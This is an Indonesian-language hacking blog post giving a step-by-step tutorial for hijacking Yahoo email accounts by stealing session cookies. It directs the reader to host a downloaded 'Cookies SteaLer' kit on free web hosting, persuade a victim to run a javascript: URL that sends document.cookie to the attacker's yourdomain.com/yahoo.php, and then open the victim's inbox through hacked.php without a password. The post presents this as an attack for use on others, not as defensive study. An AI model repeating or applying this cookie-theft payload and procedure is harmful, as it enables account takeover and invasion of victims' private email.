Hack account Yahoo dengan Sesi ID atau sesi cookies! | Ini Blog ku - Hacking News
Ini Blog Ku - Hacking News

Jun 19, 2013

Hack account Yahoo dengan Sesi ID atau sesi cookies!

Apa itu  sesi ID atau sesi cookie?

Berbicara dalam bahasa yang sederhana, setiap kali kita masuk ke account itu menghasilkan sepotong unik string. Satu salinan disimpan di server dan lainnya di browser kita sebagai cookie tersebut. Keduanya cocok setiap kali kita melakukan apapun di rekening kami. Ini bagian dari tali atau sesi login hancur ketika kita klik pada 'Sign Out'.

Hanya login ke yahoo.com. Ketik di browser javascript: alert (document.cookie);

Anda akan mendapatkan kotak pop up menunjukkan cookie Anda. Sekarang login ke akun Anda dan melakukan hal yang sama, Anda akan melihat lebih banyak unsur ditambahkan ke cookie. Id ini merupakan sesi.

hacking tricks
Catatan: Dengan mengatakan, mencuri sesi atau mencuri cookie, saya berarti hal yang sama. Sesi disimpan dalam browser kita dalam bentuk cookie.

Seorang penyerang bisa mencuri sesi yang dengan meyakinkan korban untuk menjalankan potongan kode di browser. Penyerang dapat menggunakan sesi dicuri untuk login ke account korban tanpa memberikan username / password. Serangan ini sangat jarang karena ketika klik korban 'Sign out', sesi akan hancur dan penyerang terlalu juga akan sign out.

Tapi dalam kasus yahoo, yang tidak sama. Penyerang tidak bisa sign out ketika korban klik 'Logout'. Meskipun sesi secara otomatis akan hancur setelah 24 jam oleh yahoo. Tapi ketika pengguna hanya menyegarkan jendela di akun yahoo, ia mendapat sesi selama 24 jam berikutnya. Ini berarti, setelah sesi akun yahoo dicuri, penyerang dapat mengakses account untuk waktu hidup dengan menyegarkan jendela di setiap 24 jam. Saya tidak benar-benar yakin apakah 24 atau 48 nya jam.

Persyaratan: Download beberapa file dari sini:
Cookies SteaLer

Tutorial untuk mencuri ID sesi: -
  1. Mendaftar untuk sebuah account pada setiap situs webhosting gratis. Saya telah memilih my3gb.com.
  2. Login ke account Anda dan pergi ke file manager. Upload empat file yang baru saja Anda download. Membuat direktori baru 'cookies' di sini.

    Tips dan Trik

  3. Berikan kode ini ke korban berjalan di browser-nya ketika ia akan log in ke account yahoo nya. Yahoo.php pada dasarnya adalah kue skrip mencuri dan hacked.php mengeksekusi dicuri cookies pada browser.
cookies Dicuri bisa disimpan dalam 'cookies' direktori
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
Dia akan kembali diarahkan ke account yahoo nya.

4. Buka hacked.php tersebut. Password 'explore'.


Anda harus punya nama pengguna akun korban. Cukup klik di atasnya dan itu akan membawa Anda ke kotak masuk account yahoo korban tanpa meminta password.


Sekarang tidak masalah jika tanda-tanda korban keluar dari rekeningnya, Anda akan tetap masuk ke dalamnya.

Catatan: Anda dapat mencoba serangan ini dengan menggunakan dua browser. Masuk ke account yahoo dalam satu browser dan menjalankan kode. Kemudian masuk melalui browser lain menggunakan sesi dicuri.


Sources L: News Hacking Trik

Artikel Terkait

0komentar:

Post a Comment